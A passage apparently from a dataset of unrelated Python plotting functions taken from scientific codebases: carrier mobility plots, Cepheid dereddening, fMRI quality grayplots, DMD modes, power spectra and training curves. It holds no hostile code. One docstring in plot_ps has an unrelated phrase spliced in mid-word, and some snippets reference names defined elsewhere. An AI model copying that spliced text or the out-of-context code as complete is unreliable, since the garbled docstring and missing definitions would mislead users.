plt.plot(g_en_axis - np.min(df['energy [eV]']), np.zeros(len(g_en_axis)), '-', color='black', lineWidth=lw,label='Equilibrium')\n\n for ee in fields:\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n # meanE_2 = utilities.mean_energy(chi_2_i,df)\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_2_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,'--',color = colorList[i],lineWidth=lw,label=r'Low Field {:.0f} '.format(ee/100)+r'$V \\, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n\n # plt.plot(meanE_2-np.min(df['energy [eV]']),0,'.')\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \\\n occupation_plotter.occupation_v_energy_sep(chi_3_i, df['energy [eV]'].values, df)\n plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,color = colorList[i],lineWidth=lw,label=r'Full Drift {:.0f} '.format(ee/100)+r'$V \\, cm^{-1}$')\n print(integrate.trapz(g_chiax,g_en_axis))\n\n i = i + 1\n # plt.plot(g_en_axis - np.min(df['energy [eV]']), g_f0ax, '--', color='black', lineWidth=lw,label=r'$f_0$')\n\n plt.legend()\n # plt.ylim([-0.02, 0.015])\n plt.xlabel(r'Energy above CBM ($eV$)')\n plt.ylabel(r'Deviational occupation $\\delta f_{\\mathbf{k}}$ (norm.)')\n # plt.ylabel(r'$\\delta f_{\\mathbf{k}}/f_{\\mathbf{k}}^0$')\n plt.savefig(pp.figureLoc+'energy_KDE.png', bbox_inches='tight',dpi=600)\n\n plt.figure()\n plt.plot(g_en_axis,g_chiax)\n\n plt.figure()\n Z, xedges, yedges = np.histogram2d(df['kx [1/A]']*chi_3_i,df['ky [1/A]']*chi_3_i)\n plt.pcolormesh(xedges, yedges, Z.T)\n\n from scipy.stats.kde import gaussian_kde\n g_inds,_,_ = utilities.gaas_split_valleys(df,False)\n g_df = df.loc[g_inds]\n\n x = g_df['kx [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n y = g_df['ky [1/A]']*(chi_3_i[g_inds]+g_df['k_FD'])\n\n # y = g_df['energy [eV]']*(chi_3_i[g_inds]+g_df['k_FD'])\n k = gaussian_kde(np.vstack([x, y]))\n xi, yi = np.mgrid[x.min():x.max():x.size ** 0.5 * 1j, y.min():y.max():y.size ** 0.5 * 1j]\n zi = k(np.vstack([xi.flatten(), yi.flatten()]))\n\n fig = plt.figure(figsize=(7, 8))\n ax1 = fig.add_subplot(211)\n ax2 = fig.add_subplot(212)\n\n # alpha=0.5 will make the plots semitransparent\n ax1.pcolormesh(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n ax2.contourf(xi, yi, zi.reshape(xi.shape), alpha=0.5)\n\n ax1.set_xlim(x.min(), x.max())\n ax1.set_ylim(y.min(), y.max())\n ax2.set_xlim(x.min(), x.max())\n ax2.set_ylim(y.min(), y.max())", "def plot_dereddening():\n extinction_coefficients = {'2365-2764-1': np.array([0.2622, 0.844]), '4109-638-1': np.array([0.0524, 0.1576]),\n '2058-56-1': np.array([0.0751, 0.248]), '3642-2459-1': np.array([0.1907, 0.608]),\n '3999-1391-1': np.array([0.3911, 1.2480]), '2607-1448-1': np.array([0.0430, 0.1310])}\n cepheids = {'2365-2764-1': np.array([0.959, 2.09]), '4109-638-1': np.array([0.705, 2.385]), '2058-56-1':\n np.array([1.222, 1.333]), '3642-2459-1': np.array([1.088, 2.0518]), '3999-1391-1':\n np.array([1.360, 1.2567]), '2607-1448-1': np.array([1.484, 0.6963])}\n periods = {'2365-2764-1': 1.61, '4109-638-1': 15.31, '2058-56-1': 63.08, '3642-2459-1': 1.86, '3999-1391-1': 24.98,\n '2607-1448-1': 8.54}\n max_periods = max(periods.values())\n\n new_positions_bv_mv = [] # in M_V vs B-V space\n colors = []\n theoretical_position = []\n for obj in extinction_coefficients.keys():\n # new_positions_bv_mv.append(cepheids[obj]-extinction_coefficients[obj])\n new_positions_bv_mv.append(cepheids[obj])\n colors.append(periods[obj]/max_periods)\n theoretical_position.append(-2.78*np.log10(periods[obj])-1.35)\n\n for pos in range(len(new_positions_bv_mv)):\n plt.scatter(new_positions_bv_mv[pos][0], new_positions_bv_mv[pos][1], marker='^', facecolor='w', s=40)\n plt.scatter(new_positions_bv_mv[pos][0], theoretical_position[pos], marker='o', facecolor='r', s=50)\n return new_positions_bv_mv, colors", "def plot_kde():\n f, (ax1, ax2) = plt.subplots(1, 2, sharey=True, sharex=True)\n sns.kdeplot(data.data.numpy()[:,0], data.data.numpy()[:,1], color=\"r\", shade=True, ax=ax1)\n sns.kdeplot(dec_mean.data.numpy()[:,0], dec_mean.data.numpy()[:,1], color=\"b\", shade=True, ax=ax2)\n plt.show()\n plt.pause(1e-6)\n plt.gcf().clear()", "def plot_field_uncertainties():\n\n resize_size = (1000, 1000)\n\n\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n if drug_name == 'DMSO':\n dirs = [os.path.join(path_to_here, '../data/landscape_visualizations/{}/{}/30_hours/'.format(drug_name, j)) for j in ['original', 'repeat_a', 'repeat_b']]\n\n def transform(x):\n if type(x) is np.ndarray:\n x = change_array_lims(x)\n x = np.log(x)\n return x\n\n F_unc_vmin = -7\n F_unc_vmax = -4\n sigma_vmin = -5\n sigma_vmax = 0 #0.4\n sigma_unc_vmin = -6\n sigma_unc_vmax = -2\n\n fig_Fs = [plt.figure() for _ in range(3)]\n fig_uncertainty = plt.figure()\n sigma_lists, F_arrays = [], []\n for idx_fig, dir in enumerate(dirs):\n\n p_list = _load_and_resize_list(dir+'p_list_0.pickle')\n D_list = _load_and_resize_list(dir+'D_list_0.pickle')\n U_array = pickle.load(open(dir+'U.pickle', 'rb'))\n U_array = cv2.resize(U_array, resize_size, interpolation = cv2.INTER_LINEAR)\n Gx, Gy = np.gradient(U_array, 26./resize_size[0], 26./resize_size[0]) # gradients with respect to x and y\n F_array = (Gx**2+Gy**2)**.5 # gradient magnitude\n F_array[np.isinf(F_array)] = np.nan\n F_array[p_list[-1]<1e-3]=np.nan # final PDF\n sigma_list = []\n for j in range(9):\n arr = D_list[2*j] # current PDF\n arr[p_list[j]<1e-3]=np.nan\n sigma_list.append(np.sqrt(2*arr))\n\n\n sigma_lists.append(sigma_list)\n F_arrays.append(F_array)\n\n ax = fig_Fs[idx_fig].add_subplot(111)\n ax.imshow(transform(F_array)[::-1, :], cmap = cmap, vmin = -4.6, vmax = -2)\n ax.set_title(dir)\n\n all_axes = [i for j in fig_Fs for i in j.axes]\n for ax in all_axes:\n ax.axis('off')\n\n # uncertainties\n\n std = np.std(F_arrays, axis = 0)\n ax = fig_uncertainty.add_subplot(121)\n ax.imshow(transform(std)[::-1, :], cmap = cmap, vmin = F_unc_vmin, vmax = F_unc_vmax)\n ax.set_title('F_uncertainty')\n\n fig_sigma = plt.figure()\n ax = fig_sigma.add_subplot(111)\n ax.imshow(transform(np.nanmean(sigma_lists[0], axis = 0))[::-1, :], cmap = cmap, vmin = sigma_vmin, vmax = sigma_vmax) # index 0 (i.3 'original' is corresponds to the landscapes in other figures)\n ax.set_title('sigma_mean')\n\n sigma_means = [np.nanmean(sigma_list, axis = 0) for sigma_list in sigma_lists]\n std_array = np.nanstd(sigma_means, axis = 0)\n ax = fig_uncertainty.add_subplot(122)\n ax.imshow(transform(std_array)[::-1, :], cmap = cmap, vmin = sigma_unc_vmin, vmax = sigma_unc_vmax)\n ax.set_title('sigma_uncertainty')\n\n fig_sigma.savefig(path_to_here+'/../outputs/{}_mean_sigma.png'.format(drug_name), dpi = 1200)\n fig_uncertainty.savefig(path_to_here+'/../outputs/{}_uncertainties.png'.format(drug_name), dpi = 1200)", "def small_signal_mobility_paperplot(fieldVector, freqVector, df):\n vcm = np.array(fieldVector)*1e-2\n n = utilities.calculate_density(df)\n lw = 1.5\n fig, ax = plt.subplots()\n for freq in freqVector:\n cond = []\n mu_3 = []\n for ee in fieldVector:\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(vcm, np.array(np.real(cond))/c.e/n*100**2, '-', label='{:.1f} GHz'.format(freq),linewidth=lw)\n ax.plot(vcm,mu_3,'-',label = 'Ohmic Mobility',linewidth=lw)\n plt.xlabel(r'Field ($\\rm V \\, cm^{-1}$)')\n plt.ylabel(r'AC Mobility ($\\rm cm^2 \\, V^{-1} \\, s^{-1}$)')\n plt.ylim([-0.05*np.max(mu_3),np.max(mu_3)*1.2])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.legend(ncol=3,loc='lower center')\n plt.savefig(pp.figureLoc+'ac_mobility.png', bbox_inches='tight',dpi=600)\n\n\n plt.figure(figsize=(2.05, 2.5))\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n i = 0\n for ee in fieldVector:\n colorList = [eq_color, med_color, high_color]\n cond = []\n cond_linear = []\n mu_3 = []\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n ax.plot(freqVector, np.array(np.real(cond))/c.e/n*100**2/1000, '-',\n label='{:.0f} '.format(ee/100)+r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n\n plt.xlabel(r'Frequency (GHz)')\n plt.ylabel(r'$\\Re(\\rm AC\\ mobility$) (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n plt.ylim([0, 20])\n plt.xlim([freqs[0], freqs[-1]])\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n plt.xlim([freqVector[0],freqVector[-1]])\n locmaj = matplotlib.ticker.LogLocator(base=10, numticks=6)\n ax.xaxis.set_major_locator(locmaj)\n locmin = matplotlib.ticker.LogLocator(base=10.0, subs=np.arange(2, 10) * .1,\n numticks=100)\n ax.xaxis.set_minor_locator(locmin)\n plt.savefig(pp.figureLoc+'Real_ac_mobility.png',dpi=600)\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.imag(cond)) / c.e / n * 100 ** 2, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n\n i = i + 1\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'$\\Im \\, [\\mu_{\\omega}]$ ($\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend(frameon=False)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Imag_ac_mobility.png', bbox_inches='tight', dpi=600)\n\n\n fig, ax = plt.subplots()\n i = 0\n for ee in fieldVector:\n colorList = ['black', 'dodgerblue', 'tomato']\n cond = []\n cond_linear = []\n mu_3 = []\n\n for freq in freqVector:\n mu_3 = []\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n cond.append(\n np.load(pp.outputLoc + 'Small_Signal/' + 'cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n cond_linear.append(np.load(\n pp.outputLoc + 'Small_Signal/' + 'linear_cond_' + '3_' + \"f_{:.1e}_E_{:.1e}.npy\".format(freq, ee)))\n\n ax.plot(freqVector, np.array(np.arctan(np.imag(cond)/np.real(cond)))/np.pi, '-',\n label='{:.0f} '.format(ee / 100) + r'$\\rm V \\, cm^{-1}$', linewidth=lw, color=colorList[i])\n # ax.plot(freqVector, np.array(cond_linear)/c.e/n*100**2, '-.', label='E = {:.0f} L '.format(ee/100)+r'$V \\, cm^{-1}$',linewidth=lw,color = colorList[i])\n i = i + 1\n ax.yaxis.set_major_formatter(tck.FormatStrFormatter('%g $\\pi$'))\n ax.yaxis.set_major_locator(tck.MultipleLocator(base=1.0))\n plt.xlabel(r'Frequency ($\\rm GHz$)')\n plt.ylabel(r'AC Mobility Phase Angle (Radians)')\n # plt.ylim([-0.4*np.max(mu_3),np.max(mu_3)*1.2])\n plt.xscale('log')\n plt.legend()\n yloc = plt.MaxNLocator(6)\n ax.yaxis.set_major_locator(yloc)\n # ax.text(0.55, 0.95, textstr, transform=ax.transAxes, fontsize=8, verticalalignment='top', bbox=props)\n plt.savefig(pp.figureLoc + 'Phase_ac_mobility.png', bbox_inches='tight', dpi=600)", "def plot_perturbation(wind=7, mldp=30, pref=\"ca\"):\n pl.clf()\n fig,axes = pl.subplots(3, 1, sharex=True, num=1,figsize=(6,6))\n model_kws = dict(pref=pref, reg=\"pert\",\n temp=None, salt=None, wind=wind, mldp=mldp,\n deepmld1={\"pert\":0, \"tpos\":165},\n deepmld2={\"pert\":0, \"tpos\":553},\n uppwell1={\"pert\":0, \"tpos\":165, \"pdays\":5},\n uppwell2={\"pert\":0, \"tpos\":553, \"pdays\":5})\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=0.5) \n if pref == \"ca\":\n preftxt = \"CCS\"\n model_kws[\"uppwell1\"][\"pert\"] = 82.5\n model_kws[\"uppwell2\"][\"pert\"] = 165\n else:\n preftxt = \"NWA\"\n model_kws[\"deepmld1\"][\"pert\"] = 17\n model_kws[\"deepmld2\"][\"pert\"] = 34\n md = run_model(**model_kws)\n plot_timeseries(md, axes=axes, alpha=1)\n pl.suptitle(\n f\"Perturbations, temp and salt for {preftxt}, wind:{wind}m/s, mld:{mldp}m\")\n pl.savefig(os.path.join(FIGDIR, f\"pertubation_timeseries_{pref}.pdf\"))", "def fig_2():\n epoch = 3\n N = 60000\n Nr = N\n K = 32\n n_iter = 256\n Nstar = 16\n data = 'dr10'\n factor = 100.\n features = ['psf_mag', 'model_colors', 'psf_minus_model']\n filters = ['r', 'ug gr ri iz', 'ugriz']\n message = 'pm_mc_pmm_r_all_all'\n model = 'xdmodel_%s_%d_%d_%d_%d_%s.pkl' % (data, Nr, K, n_iter, Nstar,\n message)\n model = os.environ['xddata'] + model\n figname = os.environ['xdplots'] + 'fig2.png'\n posteriors_plot(model, features, filters, figname, idx=-3)", "def linear_mobility_paperplot(fieldVector,df):\n vcm = np.array(fieldVector) * 1e-2\n lw = 1.5\n mu_1 = []\n mu_2 = []\n mu_3 = []\n meanE_1 = []\n meanE_2 = []\n meanE_3 = []\n for ee in fieldVector:\n chi_1_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '1_' + \"E_{:.1e}.npy\".format(ee))\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n mu_1.append(utilities.calc_linear_mobility(chi_1_i, df, ee) * 10 ** 4)\n mu_2.append(utilities.calc_linear_mobility(chi_2_i, df, ee) * 10 ** 4)\n mu_3.append(utilities.calc_linear_mobility(chi_3_i, df, ee) * 10 ** 4)\n meanE_1.append(utilities.mean_energy(chi_1_i,df))\n meanE_2.append(utilities.mean_energy(chi_2_i,df))\n meanE_3.append(utilities.mean_energy(chi_3_i,df))\n\n plt.figure(figsize=(2.05,2.5))\n # ax = plt.axes([0.2, 0.19, 0.75, 0.76])\n ax = plt.axes([0.21, 0.19, 0.75, 0.75])\n mufac = 1000\n # mufac = 1000\n ax.plot(vcm, np.array(mu_3)/mufac, '-', linewidth=lw, label='Warm', color=warm_color)\n ax.plot(vcm, np.array(mu_2)/mufac, '--', linewidth=lw, label='Cold', color=cold_color)\n ax.plot(vcm, np.array(mu_1)/mufac, '--', linewidth=lw, label='RTA', color=rta_color)\n\n plt.xlim([0,np.max(fieldVector)/100])\n plt.xlabel(r'Electric field ($\\rm V \\, cm^{-1}$)')\n # plt.ylabel(r'$\\sigma^{\\omega = 0}_{\\parallel}$ ($\\rm cm^2 \\, kV^{-1}\\, s^{-1}$)')\n plt.ylabel(r'DC mobility (1000 $\\rm cm^2 \\, V^{-1}\\, s^{-1}$)')\n plt.ylim([0.8e4/mufac, 2e4/mufac])\n ax.locator_params(axis='x', nbins=6)\n # plt.legend(ncol=3,loc='lower center',frameon=False)\n plt.legend(frameon=False)\n plt.savefig(pp.figureLoc +'linear_mobility2.png',dpi=600)\n\n plt.figure()\n lw = 2\n plt.plot(vcm,(np.array(meanE_1) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='RTA')\n plt.plot(vcm,(np.array(meanE_2) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Cold '+r'$e^{-}$')\n plt.plot(vcm,(np.array(meanE_3) -np.min(df['energy [eV]']))*1000,'-', linewidth=lw, label='Warm '+r'$e^{-}$')\n plt.xlabel(r'Electric field [$kV/cm$]')\n plt.ylabel(r'Mean Energy [meV]')\n plt.title(pp.title_str)\n plt.savefig(pp.figureLoc +'meanEnergy_vField.png', bbox_inches='tight',dpi=600)\n plt.legend(frameon=False)", "def fig_4():\n epoch = 3\n N = 60000\n Nr = N\n K = 32\n n_iter = 256\n Nstar = 16\n data = 'dr10'\n factor = 100.\n features = ['psf_mag', 'model_colors', 'psf_minus_model']\n filters = ['r', 'ug gr ri iz', 'ugriz']\n message = 'pm_mc_pmm_r_all_all'\n model = 'xdmodel_%s_%d_%d_%d_%d_%s.pkl' % (data, Nr, K, n_iter, Nstar,\n message)\n model = os.environ['xddata'] + model\n figname = os.environ['xdplots'] + 'fig4.png'\n xx_plot(epoch, model, features, filters, figname)", "def plot_dmstep(self):\n\n x, y = self._calculate_snr_spread()\n\n # Attach a curve\n curve = Qwt.QwtPlotCurve()\n curve.attach(self)\n curve.setPen(Qt.QPen(Qt.Qt.blue, 2))\n curve.setData(x, y)\n \n self.replot()", "def grayplot_NH(QC,stage):\n\n\n #set some constants\n numpts=QC['GMtcs'].shape[1] #number of timepoints\n rightsignallim = np.arange(-20,21,20) #GS, main plot signal limits - 2% assuming mode 1000 normalization\n leftsignallim = np.arange(0,21,10) #DVars limits\n rylimz=[np.min(rightsignallim),np.max(rightsignallim)]\n lylimz=[np.min(leftsignallim),np.max(leftsignallim)]\n FDmult = 10 #multiplier to FD to get in range of DVars values\n FDthresh = 0.2 #FD threshold to mark frame for scrubbing (use 0.1 for filtered FD)\n\n #compute data quality metrics -- CG: compute by hand to better understand (separated here for practice)\n [mvm,ddt_mvm,FD] = compute_FD(QC['MVM'])\n DVars = compute_DVARS(QC['GMtcs'][:,:,stage]) # compute DVARs for a particular processing stage\n GS = compute_GS(QC['GMtcs'][:,:,stage]) # compute global signal for a particular processing stage\n\n #create plot\n fig = plt.figure(figsize=(10,10),constrained_layout = True)\n gs = GridSpec(9,1,figure=fig)\n\n #plot individual mvm params\n ax1 = fig.add_subplot(gs[0:2])\n pointindex = np.arange(1,numpts+1)\n plt.plot(pointindex,mvm)\n\n plt.xlim([0, numpts])\n plt.ylim([-1.5, 1.5])\n plt.ylabel('mvm-XYZPYR')\n\n #Next, plot FD, DVARS and GS on the same plot\n ax2a = fig.add_subplot(gs[2:4])\n ax2b = ax2a.twinx()\n ax2a.plot(pointindex,DVars,color=[0,0,1],alpha=0.5)\n ax2b.plot(pointindex,GS,color=[0,1,0],alpha=0.5)\n ax2a.plot(pointindex,FD*FDmult,color=[1,0,0],alpha=0.5)\n ax2a.hlines(FDthresh*FDmult,pointindex[0],pointindex[-1],'k',alpha=0.5)\n \n plt.xlim([0, numpts])\n ax2a.set_ylim(lylimz)\n ax2a.set_yticks(leftsignallim)\n ax2b.set_ylim(rylimz)\n ax2b.set_yticks(rightsignallim)\n ax2a.set_ylabel('R:FD*' + str(FDmult) +' B:DV G:GS')\n\n #next plot gray matter signal\n ax3 = fig.add_subplot(gs[4:8])\n new_GMtcs = QC['GMtcs'][:,:,stage]\n plt.imshow(new_GMtcs,cmap='gray',vmin=-20,vmax=20,aspect='auto') #default: showing 2% signal on mode 1000 norm\n plt.ylabel('GRAY')\n\n #finally, plot WM and CSF ts\n ax4 = fig.add_subplot(gs[8:])\n new_WMCSF = np.vstack((QC['WMtcs'][:,:,stage],QC['CSFtcs'][:,:,stage]))\n plt.imshow(new_WMCSF,cmap='gray',vmin=-20,vmax=20,aspect='auto')\n plt.ylabel('WM CSF')\n plt.xlabel('frames')\n\n return fig", "def plot(self):\n\t\tplot_chain(self.database_path, self.temp_folder)\n\t\tplot_density(self.database_path, self.temp_folder, self.cal_params)", "def plot_dmd(self):\n n_modes = 10\n U = self.uf\n # put the decomposition axis last\n UT = U.transpose(0, 2, 1)\n # create the matrix of snapshots by flattening the non\n # decomp axes so we have a 2d array where we index the\n # decomp axis like snapshots[:,i]\n snapshots = UT.reshape((-1, UT.shape[-1]))\n\n # remove nans\n # TODO: remove nans by interpolation earlier on\n snapshots[np.where(np.isnan(snapshots))] = 0\n\n modes, ritz_values, norms \\\n = mr.compute_DMD_matrices_snaps_method(snapshots, range(n_modes))\n\n # as array, reshape to data dims\n reshaped_modes = modes.A.T.reshape((-1,) + UT.shape[:-1])\n\n fig, ax = plt.subplots(nrows=3)\n c0 = self.mean_velocity_Uf(ax[0])\n\n ax[1].set_title('First mode of DMD')\n ax[1].set_xlabel('time after front passage')\n ax[1].set_ylabel('height')\n c1 = ax[1].contourf(reshaped_modes[0], 100)\n\n ax[2].set_title('Second mode of DMD')\n ax[2].set_xlabel('time after front passage')\n ax[2].set_ylabel('height')\n # TODO: why does reshaped_modes seem to have a list of\n # duplicates?\n # Seems to be complex conjugates - why is this??\n c2 = ax[2].contourf(reshaped_modes[2], 100, levels=c1.levels)\n\n fig.colorbar(c0, ax=ax[0], use_gridspec=True)\n fig.colorbar(c1, ax=ax[1], use_gridspec=True)\n fig.colorbar(c2, ax=ax[2], use_gridspec=True)\n\n fig.tight_layout()\n\n return fig", "def dk_plotting():\n heatmap_mode1_error_x(make_heatmap=False, make_panel=True)\n\n #heatmap_mode1_error_x()\n figure_2_combined_cross_sections()\n\n #heatmap_combined_error_c()\n #heatmap_combined_error_koff()\n #heatmap_kpr_error_c()\n #heatmap_kpr_error_koff()\n\n #heatmap_kpr2_error_c()\n #heatmap_kpr2_error_koff()\n\n ctildePosterior = [truncate(f, 3) for f in list(np.arange(0.0 * KON / KP, 5.0 * KON / KP + 0.005, 0.005))[1:]]\n kofftildePosterior = [truncate(f, 2) for f in list(np.arange(0.0 / KP, 50.0 / KP + 0.05, 0.05))[1:]]\n\n #heatmap_figure_4()\n\n return 0", "def plot_vanHove_dt(comp,conn,start,step_size,steps):\n \n (fin,) = conn.execute(\"select fout from comps where comp_key = ?\",comp).fetchone()\n (max_step,) = conn.execute(\"select max_step from vanHove_prams where comp_key = ?\",comp).fetchone()\n Fin = h5py.File(fin,'r')\n g = Fin[fd('vanHove',comp[0])]\n\n temp = g.attrs['temperature']\n dtime = g.attrs['dtime']\n\n\n # istatus = plots.non_i_plot_start()\n \n fig = mplt.figure()\n fig.suptitle(r'van Hove dist temp: %.2f dtime: %d'% (temp,dtime))\n dims = figure_out_grid(steps)\n \n plt_count = 1\n outs = []\n tmps = []\n for j in range(start,start+step_size*steps, step_size):\n (edges,count,x_lim) = _extract_vanHove(g,j+1,1,5)\n if len(count) < 50:\n plt_count += 1\n continue\n #count = count/np.sum(count)\n \n sp_arg = dims +(plt_count,)\n ax = fig.add_subplot(*sp_arg)\n ax.grid(True)\n\n \n alpha = _alpha2(edges,count)\n \n ax.set_ylabel(r'$\\log{P(N)}$')\n ax.step(edges,np.log((count/np.sum(count))),lw=2)\n ax.set_title(r'$\\alpha_2 = %.2f$'%alpha + ' j:%d '%j )\n ax.set_xlim(x_lim)\n plt_count += 1\n\n mplt.draw()\n\n # plots.non_i_plot_start(istatus)\n\n del g\n Fin.close()\n del Fin", "def _plot(self, rewards, losses, epsilons):\n plt.figure(figsize=(20,5))\n plt.subplot(131)\n plt.title('Episodic Reward')\n plt.plot(rewards)\n plt.subplot(132)\n plt.title('TD Loss')\n plt.plot(losses)\n plt.subplot(133)\n plt.title('Epsilon')\n plt.plot(epsilons)\n plt.tight_layout()\n plt.show()", "def plot_pade_figure(self):\n data_analysis = DatabaseData(dataframe=self.plot_data)\n print (data_analysis.dataframe.columns)\n data_analysis.run_pade_through_R(rscript='birch',get_inits_ev=True)\n data_analysis.create_precisions()\n data_analysis.extract_pade_curve()\n x_eos_kpts, y_eos, xs_err, ys_err, x_pade_kpts, y_pade = \\\n data_analysis.create_pade_bokeh_compat(properties=self.properties)\n print (type(self.properties), self.properties)\n if self.properties == 'B':\n ext = data_analysis.Bp\n print ('HERE AT PROPERTIES', ext, type(ext))\n elif self.properties == 'BP':\n ext = data_analysis.BPp\n elif self.properties == 'E0':\n ext = data_analysis.E0p\n elif self.properties == 'V0':\n ext = data_analysis.V0p\n p = figure(plot_height=400, plot_width=400,tools=\"pan,wheel_zoom,box_zoom,reset,previewsave\",\\\n x_axis_type=\"log\", x_axis_label='K-points per atom', title='Pade Extrapolate of {0} is {1}'.format(self.properties, str(ext)) )\n p.xaxis.axis_label = 'K-points per atom'\n p.line(x_pade_kpts, y_pade, color='red')\n p.circle(x_eos_kpts, y_eos,color='blue',size=5, line_alpha=0)\n p.multi_line(xs_err, ys_err, color='black')\n if self.properties == 'B':\n p.yaxis.axis_label = 'Bulk Modulus B (GPa)'\n elif self.properties == 'dB':\n p.yaxis.axis_label = 'Bulk Modulus Pressure Derivative'\n elif self.properties == 'E0':\n p.yaxis.axis_label = 'DFT Energy (eV/atom)'\n elif self.properties == 'V0':\n p.yaxis.axis_label = 'Volume (A^3/atom)'\n\n return p", "def plot_ps(self, show=False, density=True, pcolor=\"r\", mcolor=\"b\", lw=0.6):\n\n if (density):\n \"\"\" also read the local overdeOptimization of spectroscopic surveys for testing non-Gaussianity\nnsity value and plot line colors according to\n the density value, + = red, - = blue; adjust alpha accordingly\n \"\"\"\n if len(self.ds)<self.Nsubs:\n print (\"no density data\")\n return 0\n ads=np.abs(self.ds)\n meands=np.mean(self.ds)\n mads=np.max(ads)\n normds=np.array([ads[i]/mads/1.5 for i in range(len(ads))])\n self.normds=normds\n\n for sub in range(self.Nsubs):\n #print sub\n if not(density):\n self.plt.plot(self.klist, self.pfactor*self.powerspectra[sub])\n else:\n if self.ds[sub]>meands:\n self.plt.plot(self.klist[:-1], self.pfactor*self.powerspectra[sub][1:-1], color=pcolor, alpha=normds[sub], linewidth=lw)\n else:\n self.plt.plot(self.klist[:-1], self.pfactor*self.powerspectra[sub][1:-1], color=mcolor, alpha=normds[sub], linewidth=lw)\n #self.plt.xlim(self.klist[1], 0.1)\n #if (self.normalized):\n # self.plt.ylim(0.0,2)\n #else:\n # self.plt.ylim(500, 50000)\n # self.plt.yscale('log')\n\n self.plt.xlabel(r\"$k {\\rm (h/Mpc)}$\")\n if (self.normalized):\n self.plt.ylabel(r\"$P_{\\rm subvolume}(k)/ P_{\\rm avg}(k)$\")\n self.plt.yscale('linear')\n else:\n self.plt.ylabel(r\"$P_{\\rm subvolume}(k)\\; {\\rm (Mpc/h)}^3$\")\n self.plt.yscale('log')\n\n if (show):\n self.plt.show()", "def plot_decompose(self):\n try:\n assert self._arr_seasonal is not 